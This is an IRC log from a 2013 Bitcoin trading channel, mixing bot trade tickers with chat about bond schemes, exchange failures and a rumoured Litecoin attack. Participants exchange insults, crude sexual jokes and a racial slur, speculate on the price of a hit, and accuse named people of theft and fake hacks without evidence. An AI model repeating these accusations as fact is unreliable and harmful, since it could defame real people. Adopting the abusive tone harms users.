[ASICMINER-PT] 2 @ 1.27795 = 2.5559 BTC [+] Apr 30 21:39:35 Can I invest in you? Apr 30 21:39:44 [BTCTC] [ASICMINER-PT] 1 @ 1.299 BTC [+] Apr 30 21:39:50 [BTCTC] [ASICMINER-PT] 3 @ 1.2997 = 3.8991 BTC [+] Apr 30 21:39:55 [BTCTC] [ASICMINER-PT] 1 @ 1.2998 BTC [+] Apr 30 21:40:06 [BTCTC] [ASICMINER-PT] 4 @ 1.29998 = 5.1999 BTC [+] Apr 30 21:40:27 [BTCTC] [ASICMINER-PT] 3 @ 1.29999 = 3.9 BTC [+] Apr 30 21:40:33 tiberiusiv the man who criticizes without any credentials Apr 30 21:40:40 [BTCTC] [ASICMINER-PT] 9 @ 1.3 = 11.7 BTC [+] Apr 30 21:40:43 intellectualism to the extreme! Apr 30 21:40:43 [BTCTC] [ASICMINER-PT] 30 @ 1.3 = 39 BTC [+] Apr 30 21:40:51 you must be the smartest person I know! Apr 30 21:41:04 u mad tiberiusiv Apr 30 21:41:14 y u mad brah Apr 30 21:41:17 ;;gribble tell tiberiusiv I WON'T BE IGNORED!!!!!!! Apr 30 21:41:17 yes I am gribble. why do you keep bothering me? Apr 30 21:41:26 dun be mad brah Apr 30 21:41:31 ;;tell tiberiusiv I WON'T BE IGNORED!!!!!!! Apr 30 21:41:38 seriously...u mad? Apr 30 21:41:41 ;;later tell tiberiusiv I WON'T BE IGNORED!!!!!!! Apr 30 21:41:41 The operation succeeded. Apr 30 21:41:56 [BTCTC] [ASICMINER-PT] 1 @ 1.29999 BTC [-] Apr 30 21:42:08 ;;later tell tiberiusiv I have 75 btc now liquid. Soon I will have a few hundred as things grow. Apr 30 21:42:08 The operation succeeded. Apr 30 21:43:02 ;;later tell tiberiusiv You are a poop who has no rational statements to use because you'd rather be accusatory rather than contribute anything of value to society, like a greedy American addicted to the allure of wealth. Apr 30 21:43:02 The operation succeeded. Apr 30 21:43:05 [HAVELOCK] [HIM] 1 @ 1.898 BTC [+] Apr 30 21:43:06 [HAVELOCK] [HIM] 1 @ 1.898 BTC [+] Apr 30 21:43:30 :D Apr 30 21:43:55 [BTCTC] [ASICMINER-PT] 1 @ 1.30999 BTC [+] Apr 30 21:45:19 he's not pokceting coins dude Apr 30 21:45:57 they pay out pretty much the same dividends every month... Apr 30 21:46:11 MPOE doesn't keep any cash on hand Apr 30 21:46:30 It lost bondholder money Apr 30 21:46:34 not any money of it's own Apr 30 21:46:35 https://bitcointalk.org/index.php?topic=178535.0 Apr 30 21:46:41 betbtcnow.com ? never heard of it. Apr 30 21:47:05 so your point is bondholders put up capital, .23~ loss per coin Apr 30 21:47:16 = scam Apr 30 21:47:48 proof of faking trades? Apr 30 21:48:21 anonymous shareholders != scam Apr 30 21:49:35 dude you're making bs claims with no evidence Apr 30 21:49:46 in terms of faking tarades Apr 30 21:50:10 Bugpowder is up 1500% Apr 30 21:50:29 [MPEX] [S.MPOE] 2884 @ 0.00072623 = 2.0944 BTC [+] Apr 30 21:51:07 because it's not? Apr 30 21:51:37 how? Apr 30 21:52:15 dude MPOE doesn't hold capital Apr 30 21:52:22 so he won't run out of money Apr 30 21:53:07 dude the bondholder list is huge Apr 30 21:53:30 apparently someone just sent 40 btc to SD in -otc and lost it Apr 30 21:53:36 because you're full of shit Apr 30 21:53:38 hurrr Apr 30 21:54:01 it amuses me how accusatory you are Apr 30 21:54:03 ouch re: 40btc Apr 30 21:54:19 i'm far from broke? Apr 30 21:54:25 tiberiusiv how can i make money Apr 30 21:56:13 fine ignore me Apr 30 22:02:16 [BTCTC] [S.DICE-PT] 1 @ 0.003625 BTC [+] Apr 30 22:03:17 [BTCTC] [S.DICE-PT] 99 @ 0.003625 = 0.3589 BTC [+] Apr 30 22:07:19 thestringpuller: http://trilema.com/2013/mpoe-march-2013-statement/ Apr 30 22:07:33 mircea is 68K of 84K in bondholder capital Apr 30 22:08:14 only 80.9% Apr 30 22:09:11 and this month, only 6.4 kbtc in bonds were sold Apr 30 22:09:34 but at 12.5% Apr 30 22:09:41 that's a pretty steep rate Apr 30 22:10:10 needs to be, to induce people to put up bonds that are almost guaranteed to take huge writedowns Apr 30 22:11:14 benkay only 6.4 in bonds were needed. Apr 30 22:11:33 projected expenses, right? Apr 30 22:12:53 how is necessary bond capital determined? the bot says "I want to underwrite bonds!" and then does so? Apr 30 22:13:08 retroactively. looks how much exposure it had at the point it had the most exposure. Apr 30 22:17:18 nobody's modeling anything Apr 30 22:17:22 nobody's writing this shit up Apr 30 22:17:31 it's just a bunch of opionions flying back and forth on irc Apr 30 22:17:46 you have a claim Apr 30 22:18:24 so, what would be a good metric for evaluating this claim? Apr 30 22:18:53 "lawless romania" haha right Apr 30 22:19:28 dun dun dun dun dun da da Apr 30 22:19:53 here in romania, we make own rules Apr 30 22:19:57 kinda need citations to support these claims, only because ISPs do not prosecute scriptkiddies there does not mean much Apr 30 22:20:35 to actual studies operationalizing such terms as (lol) 'fraud capital' :) Apr 30 22:21:00 i can also buy a cop in my hometown, though not sure of price :P Apr 30 22:21:36 tiberiusiv, what country are you from? Apr 30 22:21:50 tiberiusiv: eat my cock, welcome to ignore for the 5th time this month. Apr 30 22:24:00 lol, did you read the article you linked to mate, it doesn't really say anything apart from mentioning the keywords that matched your google query Apr 30 22:24:54 tiberiusiv doesn't take anything in, he merely spews outward Apr 30 22:25:02 "But outside these run-down flats, the streets are full of expensive, fast cars that are a marked contrast to their surroundings. [same in many countries, saw that in sarajevo, etc] The hackers like to show off their wealth and power with these high-powered vehicles, which they race through the streets at night. [this does not follow from the prev sentence" Apr 30 22:25:02 not sure why i'm responding though :( Apr 30 22:25:31 so tiberiusiv do you know mircea_popescu Apr 30 22:25:41 i'm curious about your motivations Apr 30 22:26:08 normally people are vocal about this sort of thing have some one else pulling the strings, so to speak Apr 30 22:26:19 so it seems odd, unfounded, not genuine. Apr 30 22:26:26 thestringpuller!!! it's you! Apr 30 22:26:36 not really. fuck him Apr 30 22:26:40 i don't know him Apr 30 22:26:40 ^ Apr 30 22:26:54 ditto Apr 30 22:26:58 but i am curious about your motivations Apr 30 22:27:02 at this point Apr 30 22:27:12 are you sure about that? Apr 30 22:27:28 i'm going to believe you for now i guess Apr 30 22:27:39 what about s.dice? is that a scam as well? Apr 30 22:27:41 bitcoins at any price over 8$ are a scam, go tell #bitcoin-anal about it Apr 30 22:27:43 but your outspoken nature on romanians is highly suspect Apr 30 22:27:56 so are MP's on "niggers" Apr 30 22:28:05 pfff. Apr 30 22:28:18 just elbowing you Apr 30 22:28:27 smh Apr 30 22:28:51 so bitcoin is a scam or what Apr 30 22:29:03 sdice is an awesome example of what happens in economies that think they're unregulatable Apr 30 22:29:03 i think it might be a scam mircea_popescu Apr 30 22:29:22 jcpham brb gotta post on my blog. Apr 30 22:29:28 oh wait tiberiusiv said it isn't a scam now Apr 30 22:29:37 i thought it was a scam a minute ago Apr 30 22:29:49 my mistake. Apr 30 22:29:51 totally Apr 30 22:30:03 can i be a scam too? Apr 30 22:30:12 will you tell people Apr 30 22:30:21 super Apr 30 22:31:06 wait what ? Apr 30 22:31:07 how many bitcoins do i need to posses to own a "few" Apr 30 22:31:08 im confused. Apr 30 22:31:23 what's the arbitrary number Apr 30 22:31:27 that makes me cool Apr 30 22:31:27 jcpham 13, as established by uppittytortilla Apr 30 22:31:35 i got that Apr 30 22:31:42 toattally in the cool kids club Apr 30 22:31:43 k send them to me now Apr 30 22:31:48 psssh Apr 30 22:31:51 scammer Apr 30 22:31:51 FOAR TEH BONDS Apr 30 22:31:54 romanian scammer Apr 30 22:31:58 send them to me or you don't go to the supernode. Apr 30 22:32:03 fuck Apr 30 22:32:08 i need it for Helsinki Apr 30 22:32:13 1sendhereorelsenosupernode1254 Apr 30 22:32:15 1.5 class suernode Apr 30 22:32:25 anyone knows a good bitcoin trading channel ? Apr 30 22:32:33 not this one Apr 30 22:32:52 #bitcoin-spacedicks Apr 30 22:33:13 rigacrypto this but romanians aren't allowed so. Apr 30 22:33:29 1-2 btc is not a percentage of my total ealth Apr 30 22:33:33 i do percentages Apr 30 22:33:35 jcpham is a semenair Apr 30 22:33:49 1-2 btc is FIDDY PERCENTAGES Apr 30 22:33:51 dub what?!? thaere's semen in the air!>!?! Apr 30 22:33:53 of your total poverty Apr 30 22:34:11 hundredaire Apr 30 22:34:23 popping cola bottles Apr 30 22:34:51 anybody shorting bitcoins ? Apr 30 22:34:51 i don't even think i can link you to wallet i controll with a lot of coins Apr 30 22:34:58 you naughtaires Apr 30 22:34:58 sorry to disappoint Apr 30 22:34:59 what's your entry point and when do you plan to close the position ? Apr 30 22:35:45 drinkin' tap water Apr 30 22:35:53 rigacrypto: here ppl prefer mpoe options as "entry points" Apr 30 22:35:55 shorting? like long term shorting Apr 30 22:35:56 pfft , I won't use a 1.5 supernode Apr 30 22:36:02 only 1.49 or better Apr 30 22:36:04 or just short term- shorting like today Apr 30 22:36:04 [HAVELOCK] [VTX] 1 @ 0.471 BTC [-] Apr 30 22:36:23 long term. never fight the bots Apr 30 22:36:29 wow Apr 30 22:36:41 @jurov: ok Apr 30 22:36:44 but the bots are the market Apr 30 22:37:05 [HAVELOCK] [SDICE] 1 @ 0.32701996 BTC [+] Apr 30 22:37:11 i have a hard time planning anything for more than afew hours Apr 30 22:37:21 the market is made of hype-controlled people Apr 30 22:37:35 or hype-producing people... Apr 30 22:37:37 analyze the hype cycle and you can guess the market Apr 30 22:37:38 and rigacrypto, my ex-boss asked me the same some time ago Apr 30 22:38:00 the best answer around was "don't buy bitcoins at all" Apr 30 22:38:05 [HAVELOCK] [SDICE] 1 @ 0.3211 BTC [-] Apr 30 22:38:14 rigacrypto i couldn't stay short for more than a few hours Apr 30 22:38:38 the hype circle jerk is in -otc and I would'nt stick micrea-popescus dick in that shithole of a channel Apr 30 22:39:01 a better strategy: long when it's low and short when it's high :D Apr 30 22:39:02 they are talking about btcjam loans still Apr 30 22:39:28 rigacrypto: right now it is low or high? Apr 30 22:39:36 a million bitcoins question :D Apr 30 22:39:53 at 160, my entry point, it was high; I wonder the same thing now :) Apr 30 22:39:59 i still think we're correcting to 4 digits Apr 30 22:40:02 i think right now there is one buyer and one seller Apr 30 22:40:03 might take 9 months Apr 30 22:40:05 though Apr 30 22:40:33 let's divide us to bulls, bears and boars and vote Apr 30 22:41:36 on what timeframe, jurov ;) ? Apr 30 22:41:58 medium short-to-long term Apr 30 22:42:08 rigacrypto: there is #bitcoin-analysis but its turning into -otc Apr 30 22:43:35 the dumber the better. good proxy for market sentiment Apr 30 22:43:40 otc it is then Apr 30 22:43:45 gl. Apr 30 22:44:01 oh, then there's btc-e trollbox (but it's mostly about ltc) Apr 30 22:46:41 how is ltc doing, any panic from the looming lukepocalypse? Apr 30 22:47:19 no change recently Apr 30 22:47:44 hovering above 0.03 btc Apr 30 22:48:35 i hope that attack coincides with mtgox launch...for moar drama Apr 30 22:49:35 attack? Apr 30 22:49:56 benkay, luke-jr promises to 51% litecoin Apr 30 22:50:10 nice Apr 30 22:50:19 why? Apr 30 22:50:20 supposedly it users scrypt wrongly and prone to fpgas Apr 30 22:50:41 because alt coins are bad Apr 30 22:50:49 and bitcoin needs more drama Apr 30 22:51:41 let's all waste the one asset we never get more of Apr 30 22:52:39 maybe bitcoin became sentient AI and hates competitors and it's hungry for drama Apr 30 22:52:54 and miners are his minions Apr 30 22:52:57 why? << because he'd like people to think he still has miner relevance. Apr 30 22:53:07 i guess in the end he'll attack ppcoin or something Apr 30 22:53:42 kinda surprised he hasnt Apr 30 22:54:03 iirc ppcoin uses merged mining with btc Apr 30 22:54:20 no it doesnt, or he would have Apr 30 22:54:53 cuz attacking a coin is great for your rep Apr 30 22:55:14 look at how much we adored the devs after the bitcoin fork Apr 30 22:55:23 lol Apr 30 22:55:55 there will be some ideological resason that makes sense only to the type of person that would rape his wife with his four kids in the bed next to them Apr 30 22:56:00 i'd help luke 51% litecoin Apr 30 22:56:02 for sure Apr 30 22:56:15 when does that happen Apr 30 22:56:23 because i can? Apr 30 22:56:24 it's the productive thing to do Apr 30 22:56:28 wednesday after lent. Apr 30 22:56:37 litecoin has no value Apr 30 22:56:45 other than to hedge against bitcoin Apr 30 22:56:50 dub pix ? Apr 30 22:56:50 thus attacking litecoin has value? Apr 30 22:56:59 it's neat and all....and that's a neat value Apr 30 22:57:03 but sort of pointless Apr 30 22:57:18 http://trilema.com/2013/why-finance-shouldnt-be-open-to-your-average-schmoe/#comment-92985 Apr 30 22:57:18 making an attack even more pointless Apr 30 22:57:20 is that tibby ? Apr 30 22:57:41 ThickAsThieves so i should quit now? Apr 30 22:58:04 [MPEX] [S.MPOE] 5800 @ 0.00073864 = 4.2841 BTC [+] Apr 30 22:58:15 i hate litecoin because i missed the pump and dump Apr 30 22:58:17 let the kids have their fun i say Apr 30 22:58:22 during $260 bitcoins Apr 30 22:58:25 jcpham you know what ? i missed it too Apr 30 22:58:31 bought them cheap sold like 25% of the way up Apr 30 22:58:33 jeez it was epic Apr 30 22:59:01 mircea_popescu: I can answer that question:- because bitcoin Apr 30 22:59:14 i thought i was all fancy selling my litecoins at like .026 Apr 30 22:59:24 then it kept going Apr 30 22:59:30 they got up to like $10 or something right Apr 30 22:59:37 maybe 5$ Apr 30 22:59:39 .04+ i think Apr 30 22:59:40 way too much Apr 30 22:59:40 dub which q are you answering ? Apr 30 22:59:48 all questions Apr 30 22:59:50 why-finance-shouldnt-be-open-to-your-average-schmoe/ Apr 30 23:00:10 a a. myeah. Apr 30 23:00:48 omg mircea_popescu Apr 30 23:00:56 i already clowned on him in -otc Apr 30 23:01:05 talk about a 1st owrld problem Apr 30 23:01:12 his house looks fine Apr 30 23:01:22 no dude. Apr 30 23:01:28 must spend 200 btc to add a balcony. Apr 30 23:01:37 retarded Apr 30 23:01:55 ;;ticker Apr 30 23:01:55 BTCUSD ticker | Best bid: 136.01000, Best ask: 137.75000, Bid-ask spread: 1.74000, Last trade: 137.87980, 24 hour volume: 60555.46093699, 24 hour low: 134.00000, 24 hour high: 146.93000, 24 hour vwap: 140.33742 Apr 30 23:02:03 (i had no idea wtf he's doing at the time of writing, but anyway) Apr 30 23:02:08 nice spread Apr 30 23:02:21 it's a laughable forum post Apr 30 23:07:06 [BTCTC] [COGNITIVE] 5 @ 0.2 = 1 BTC [+] Apr 30 23:07:15 [BTCTC] [COGNITIVE] 1 @ 0.2 BTC [+] Apr 30 23:07:23 [BTCTC] [COGNITIVE] 1 @ 0.2 BTC [+] Apr 30 23:25:36 ah finally! Apr 30 23:25:49 ;;eauth mircea_popescu Apr 30 23:25:49 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Apr 30 23:26:18 ;;everify freenode:#bitcoin-otc:8689fa94da1f1eb79f997983fc12ba991db3bad46a67ddd64eae7819 Apr 30 23:26:19 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Apr 30 23:26:20 win. Apr 30 23:26:25 it works here too now. Apr 30 23:28:16 oh, nice. Apr 30 23:29:31 "The difference between the Valley and Eastern Europe is that in the Valley spammers get VC funding. Also, the spam is beautifully designed." Apr 30 23:38:02 p33r for now i have j00 key Apr 30 23:43:03 [BTCTC] [COGNITIVE] 5 @ 0.2 = 1 BTC [+] Apr 30 23:48:35 jurov: eh, when did I promise that? Apr 30 23:49:07 lemme check Apr 30 23:51:03 [BTCTC] [BTC-BOND] 1 @ 0.0101 BTC [+] Apr 30 23:51:31 Luke-Jr: okay, seems you "just" Apr 30 23:51:35 spread a rumor Apr 30 23:52:08 also won't be me doing it Apr 30 23:54:57 a followup https://bitcointalk.org/index.php?topic=188735.msg1988722#msg1988722 Apr 30 23:56:04 lmai Apr 30 23:56:35 is like Apr 30 23:56:41 id code it 10 years ago Apr 30 23:56:42 :\ Apr 30 23:57:03 (when i was 15) Apr 30 23:57:37 maybe id do a better job Apr 30 23:57:46 even. Apr 30 23:58:30 ya i was thinking, yet anoither kid with php doing an exchange. Apr 30 23:59:06 well, its not the phps fault, just cause some idiots drive into a wall cars are not inheritly bad May 01 00:00:32 o sure. May 01 00:00:39 if anything it's php's fault for being too good. May 01 00:00:43 so everyone uses it. May 01 00:00:47 :) May 01 00:01:40 i should be getting paid for this bashing! May 01 00:01:47 its too valuable May 01 00:01:53 to rant for free May 01 00:01:56 stfu, you got 0.1btc..a fortune May 01 00:02:06 -assets got those May 01 00:02:06 [BTCTC] [ASICMINER-PT] 1 @ 1.24688 BTC [-] May 01 00:02:13 to help kako with development! May 01 00:02:15 [BTCTC] [ASICMINER-PT] 1 @ 1.245 BTC [-] May 01 00:02:26 accually i got nothing yet. May 01 00:02:34 just unfunded short position May 01 00:02:39 lol May 01 00:02:40 anyway, what's planned? May 01 00:02:51 see, when i flatteded icbit i got like a few hundred out of it. May 01 00:03:40 ya but icbit accually half worked May 01 00:03:43 this doesnt. May 01 00:04:13 hmm, btc.sx May 01 00:04:24 why do people keep using zhoutongs code? May 01 00:04:45 you think its his? May 01 00:05:11 23:04.19 ( ezdiy ) why do people keep using zhoutongs code? < -- cause amir May 01 00:05:32 ah May 01 00:05:40 bitcoinica's code aint even zhoutongs? :) May 01 00:05:52 amir leaked it iirc? May 01 00:06:16 yeah, who knows May 01 00:06:33 maybe he wrote it May 01 00:06:36 and zhoutong stole it May 01 00:06:37 lol May 01 00:06:46 no no May 01 00:06:54 zhoutong is in the biz of stealing btc May 01 00:06:56 not stealing code May 01 00:07:31 i think zhoutong was just pressed by the circumstances May 01 00:07:40 eh? May 01 00:07:42 i mean, his bucketshop has been basically printing money May 01 00:07:52 what? May 01 00:08:10 it made no sense to kill it May 01 00:08:17 unless he got bored with it or something May 01 00:08:25 ezdiy nah, zhoutong wriote it, then brought it "bitcoin consultancy" "experts" May 01 00:08:35 mircea_popescu: i know May 01 00:08:36 who supervised the next two hackjs and leaked the code May 01 00:08:39 a ok May 01 00:08:52 mircea_popescu: what is interesting the speculation which follows up May 01 00:09:00 anyway, they were actually losing money with it. May 01 00:09:21 [MPEX] [S.MPOE] 1950 @ 0.00073244 = 1.4283 BTC [-] May 01 00:09:22 were they? May 01 00:09:46 from what i gather its been extremely profitable before it was sold to intersango :) May 01 00:09:52 i mean May 01 00:09:58 with spreads like 10% May 01 00:10:21 you simply cant lose money May 01 00:10:27 you gather wrongly. May 01 00:10:38 there's emails leaked showing zhoutong taking no salary because they had losses. May 01 00:10:46 sure May 01 00:11:00 i'm talking before intersango took over May 01 00:11:00 overall it probably never made enough to cover the sum total of hacks. May 01 00:11:22 im guessing losses was cause gox May 01 00:11:25 after that i suspect zhoutong just asset stripped it May 01 00:11:48 kakobrekla: yeah, the "hacks" May 01 00:11:49 i mean May 01 00:12:05 you dont just run with the money like some low life crook May 01 00:12:14 you just claim you were hacked in bitcoin world :) May 01 00:12:38 what happened to the kid ? I heard about a mysterious "investor" putting 50K to "insure" bitfinex loans May 01 00:12:38 accually im suprised tux is still alive May 01 00:13:00 they took a loss during the recent volatile market, and eat it May 01 00:13:03 rexcrypto sounds like bs and how is bitfinex related rly ? May 01 00:13:09 rexcrypto: i'd not be surprised if he's alive and well, and pulling the strings May 01 00:13:31 i mean how much one must owe to get a hit May 01 00:13:37 on him/her May 01 00:13:46 kakobrekla: to get a hit? May 01 00:13:47 ? May 01 00:13:53 isn't bitfinex using the same source code ? May 01 00:14:00 rexcrypto: yes May 01 00:14:10 ezdiy to wack him May 01 00:14:18 rexcrypto: however its not as simple as that May 01 00:14:26 rexcrypto: the house must be constantly adjusted to not lose money May 01 00:14:37 1mio usd ? 10 mio usd ? 100 mio? May 01 00:14:47 i suspect only zhoutong could do that without throwing off people with outrageous spreads May 01 00:16:04 kakobrekla: to get a hitman to the tune 100k imo May 01 00:16:12 kakobrekla: its not imo about the money, but knowing the right people May 01 00:16:13 not even a hitman May 01 00:16:19 frozen account, etc. May 01 00:16:23 [MPEX] [S.MPOE] 816 @ 0.00073244 = 0.5977 BTC [-] May 01 00:16:36 jurov: huh? May 01 00:16:38 100k? May 01 00:16:43 thats nothing. May 01 00:16:45 i really wonder why this happened only to bitcoin-24 owner so far May 01 00:16:51 and no other exchange May 01 00:16:53 kakobrekla: yup May 01 00:16:56 he has like 20k coins May 01 00:16:59 from bitcoinica May 01 00:17:00 iirc May 01 00:17:05 ;;ticker May 01 00:17:06 BTCUSD ticker | Best bid: 137.25041, Best ask: 137.50000, Bid-ask spread: 0.24959, Last trade: 137.50000, 24 hour volume: 63683.40158072, 24 hour low: 134.00000, 24 hour high: 146.93000, 24 hour vwap: 140.15166 May 01 00:17:12 ;;calc 20000*137 May 01 00:17:12 2740000 May 01 00:17:15 the kid was chinese, right ? is it simply a coincidence bitfinex is in HK ? then they come up with mystery "investors" May 01 00:17:19 kakobrekla: thats like 2 years ago May 01 00:17:25 so he holds like 3mio May 01 00:17:35 of other peoples money May 01 00:17:44 nothing compared to what bitfloor did May 01 00:17:47 rexcrypto: i dont think hes in directly May 01 00:17:48 and they want to eat him alive May 01 00:17:51 aint that interesting. May 01 00:17:52 that would be too dangerous May 01 00:17:53 and stupid May 01 00:17:59 but people forget quickly May 01 00:18:03 so what do we know May 01 00:18:24 [BTCTC] [CRYPTO-TRADE] 5 @ 0.18 = 0.9 BTC [+] May 01 00:19:06 kakobrekla: was there any banking fiat lost in bitcoinica hack? May 01 00:19:11 or was it just mtgox codes? May 01 00:19:25 because btc and mtgox codes .... lol, good luck suing someone just for that May 01 00:19:41 if there is no legally binding record of transaction May 01 00:20:04 he admits it May 01 00:20:53 what ever happened to zhoutong's book ? May 01 00:21:09 he was planning to write the "bitcoin book" May 01 00:26:02 [BTCTC] [ASICMINER-PT] 1 @ 1.23505 BTC [-] May 01 00:27:45 don't get Zhoutonged man May 01 00:28:09 "How to zhoutong for fun and profit" May 01 00:29:11 bitfinex is the only bucket shop that can do a BTC short May 01 00:29:14 biggest troll ever Zhoutong May 01 00:29:27 so I'm probably getting zhoutonged as we speak May 01 00:35:30 rexcrypto: yup May 01 00:35:56 other than being in ruby, the bitcoinica code is actually pretty decent May 01 00:36:26 the leaked version has some bugs so you can beat the house pretty quickly, that seems to be fixed on bitfinex now :( May 01 00:37:56 https://bitcointalk.org/index.php?topic=174620.msg1986595#msg1986595 May 01 00:37:57 awww May 01 00:38:06 [HAVELOCK] [HIM] 1 @ 1.85 BTC [-] May 01 00:38:07 [HAVELOCK] [HIM] 1 @ 1.85 BTC [-] May 01 00:38:54 ezdiy you tried it ? May 01 00:39:38 bwahaha May 01 00:41:17 i was scammed in rl today May 01 00:41:53 i know, it's dumb, when they say "free refills", it's implied it means IN THAT VISIT May 01 00:41:54 by a girl ? May 01 00:42:02 what a scam May 01 00:42:47 accually yea, a cahier ... and i was checkin the bill cause i though it was funny but aparently it went past me in the heat of the moment May 01 00:42:54 [BTCTC] [B.YABMC] 2 @ 0.0142 = 0.0284 BTC [+] May 01 00:43:48 so report her May 01 00:43:49 kakobrekla: more often than not cashiers dont do it intentionally May 01 00:43:53 unless they're vietnamese May 01 00:43:58 she slipped you a mickey! May 01 00:44:04 then count the change. twice. and check for fake bills. May 01 00:44:19 hm twas like 20 euro or so May 01 00:44:28 its gonna cost me more than that to try to fix it May 01 00:44:45 [BTCTC] [COGNITIVE] 1 @ 0.21 BTC [+] May 01 00:44:47 so meh May 01 00:45:05 fake 20 euro bill ?! May 01 00:45:19 no, the bill should be 100 instead of 120 May 01 00:45:31 um May 01 00:45:34 a ok May 01 00:46:05 [HAVELOCK] [VTX] 1 @ 0.47939799 BTC [+] May 01 00:49:01 dudes if anyone is not reading that uppity tortilla thread.... you're missing out. May 01 00:49:11 this is what something awful would be if they had any humor May 01 00:49:39 id pay him to come here May 01 00:49:44 so we dont need to check the forums May 01 00:50:03 "We will also have a private forum in 48 hours max, for the delegates and people in the process." May 01 00:50:11 we'll miss out soon :/ May 01 00:50:51 yeah installing phpbb takes 48hrs max May 01 00:51:23 jurov there's going to be leaks. May 01 00:51:34 pigeons is probably whetting his pastebins as we speak May 01 00:51:49 is mpoe-pr on the invite list under some other handle? May 01 00:51:54 a May 01 00:52:52 yes, likely several May 01 00:53:36 for the record May 01 00:53:37 http://www.tripadvisor.com/Hotel_Review-g189934-d199923-Reviews-Hotel_Kamp-Helsinki_Southern_Finland.html May 01 00:53:48 8 out of 69 in helsinki May 01 00:53:50 premier in finland May 01 00:54:41 200 dollah a night, mkay. May 01 00:54:50 this dood needs to visit dubai. May 01 00:55:07 meh budai. May 01 00:55:18 lol May 01 00:55:24 "I did feel I wasn't taken as seriously as those who were wearing business dress, until the receptionist saw my booking... " May 01 00:55:42 what issues people have ;/ May 01 00:55:46 lol what will reception say to horde of bitcoiners May 01 00:55:51 you need to be taken seriously by receptionists now ? May 01 00:56:21 you know, equal treatment May 01 00:56:37 First, thank you for the personal invitation. I'm flattered. May 01 00:56:37 For all that I post here about Bitcoin, my own activities about it, and where I see it going in the future, at the moment I am still truly small potatoes. 50k minicoins - the theoretical price of one ticket if I take too long to decide - is a large portion of my total Bitcoin holdings. May 01 00:56:39 lmao May 01 00:56:41 poor guy. May 01 00:57:03 who is that May 01 00:57:11 and what is mini coin May 01 00:57:45 mBTC May 01 00:57:59 some guy he invited. May 01 00:58:01 you know fuck you and your SI prefixes, i have two shovels of coins. May 01 00:58:07 haha May 01 00:58:35 imo minicoin = leetc. May 01 00:58:53 Goat sold me 700,000mBTC for 2.65M THB yesterday May 01 00:58:54 da fuck. May 01 00:59:09 THB is like GBH but cheaper? May 01 00:59:18 GHB May 01 01:00:11 lol i think it's thai baht May 01 01:00:14 I have almost contracted a team of 3 bright and beautiful young women to help with the organising of the summit (+ being The Summit Secretariat during the event, if ever we reach 30 participants - which I doubt but will employ them anyway) May 01 01:00:17 are you talking about reptila's slumber party ? that man is utterly delusional May 01 01:00:28 i have almost blown a loat in a girl's ass today. May 01 01:00:34 except i did it yesterday. May 01 01:00:44 rexcrypto he's funny :D May 01 01:00:59 [BTCTC] [ASICMINER-PT] 1 @ 1.22 BTC [-] May 01 01:02:09 lol i almost googled loat... then realized it's prolly load May 01 01:02:19 context is underrated May 01 01:02:25 ;;ud loat May 01 01:02:26 http://www.urbandictionary.com/define.php?term=loat | a large, sometimes furry creature who fears interpersonal interaction and prefers to remain secluded from society in its own world; see also HERMIT, REJECT ... May 01 01:02:43 that's reptila May 01 01:02:55 totally. May 01 01:02:57 loat is a large, sometimes furry crature. May 01 01:02:58 hah imagine blowing a loat into some poor lady's hiney May 01 01:03:01 creature May 01 01:03:09 do you stick it in first and then inflate it? May 01 01:03:19 benkay you can... May 01 01:03:43 or inflate it on the outside and make her squirm during the insertion May 01 01:03:46 http://i408.photobucket.com/albums/pp167/Sumerianhunter/Me/weird-guy-with-guns.jpg May 01 01:03:48 original loat. May 01 01:04:23 my eyes May 01 01:04:30 damn you my eyes! May 01 01:04:49 subquestion : why of why is his upper left thigh yellow ? May 01 01:05:04 piss May 01 01:05:29 benkay why eyes? rather brain is hurt trying to imagine how mircea was using it May 01 01:05:53 that's easy May 01 01:05:57 gaping's a thing May 01 01:06:04 there's no banana for scale in there May 01 01:06:07 he's actually not that large May 01 01:06:11 wanna bet that guy's a pickup artist ? May 01 01:06:13 if there were a banana we'd be able to tell May 01 01:06:22 feels good. May 01 01:06:24 end of story. May 01 01:06:38 also dom/sub stuff but that may escape you. May 01 01:06:43 but butbut... he got blown? must have been a mess May 01 01:06:58 i love the wii guitar May 01 01:07:05 lol is that what that is ? May 01 01:08:18 i think so May 01 01:08:24 i keep opening the image and closing it again May 01 01:08:34 haha May 01 01:08:40 not one but two wii-tars May 01 01:08:54 or rock band May 01 01:09:06 [HAVELOCK] [SDICE] 1 @ 0.331 BTC [+] May 01 01:09:08 dude would probably froth hard at the wii implications, May 01 01:28:07 [MPEX] [S.MPOE] 5100 @ 0.00071681 = 3.6557 BTC [-] May 01 01:29:00 https://bitcointalk.org/index.php?topic=191898.0 May 01 01:29:17 will this have the same 'issues' ziggap had? May 01 01:30:33 >When Crypto Street launches, we'll hold massive funds within each exchange, eliminating the need to figure out this funneling. May 01 01:31:31 yaright, May 01 01:31:37 lol "it rhymes with marbitrage" May 01 01:31:40 everyone has veteran bankers, massive funds and what else May 01 01:31:48 sex, May 01 01:31:49 it also rhymes with skateboards May 01 01:32:37 optimystic:signed up, excited to see and use May 01 01:48:03 reptila is getting desperate: he added a new ticket type "virtual delegate", 5BTC May 01 01:48:08 no chance to impress the receptionist tough May 01 01:48:29 oh, excuse me... 5000 mBTC May 01 01:50:26 a teaspoon of btc? May 01 01:51:30 ;;calc 1 teaspoon in drops May 01 01:51:30 Error: invalid syntax (, line 1) May 01 01:52:54 [BTCTC] [ASICMINER-PT] 1 @ 1.21047 BTC [-] May 01 02:00:23 http://xkcd.com/1200/ May 01 02:08:31 gah May 01 02:09:10 I'd like to print that out on a bit of 4x2 and beat our new corp security clowns with it May 01 02:18:57 its 2x4 May 01 02:25:38 pedant May 01 02:26:00 maybe i will suggest to reptelia the name ACE May 01 02:26:16 Ass Clown Exchange May 01 02:26:38 IACEP May 01 02:26:48 Insane Ass Clown Exchange Posse May 01 02:26:50 Possee May 01 02:26:53 Possee May 01 02:26:58 goddamnit. posse. May 01 02:30:50 could call themselves juggleasses May 01 02:33:29 [BTCTC] [ASICMINER-PT] 1 @ 1.229 BTC [+] May 01 02:39:40 [BTCTC] [COGNITIVE] 2 @ 0.201 = 0.402 BTC [-] May 01 02:40:37 [BTCTC] [ASICMINER-PT] 1 @ 1.229 BTC [+] May 01 02:48:59 im still waiting for them to produce 30 chicks. May 01 02:49:39 perhaps somebody should whisper in his ear that at my thing i had the guests harassed by a 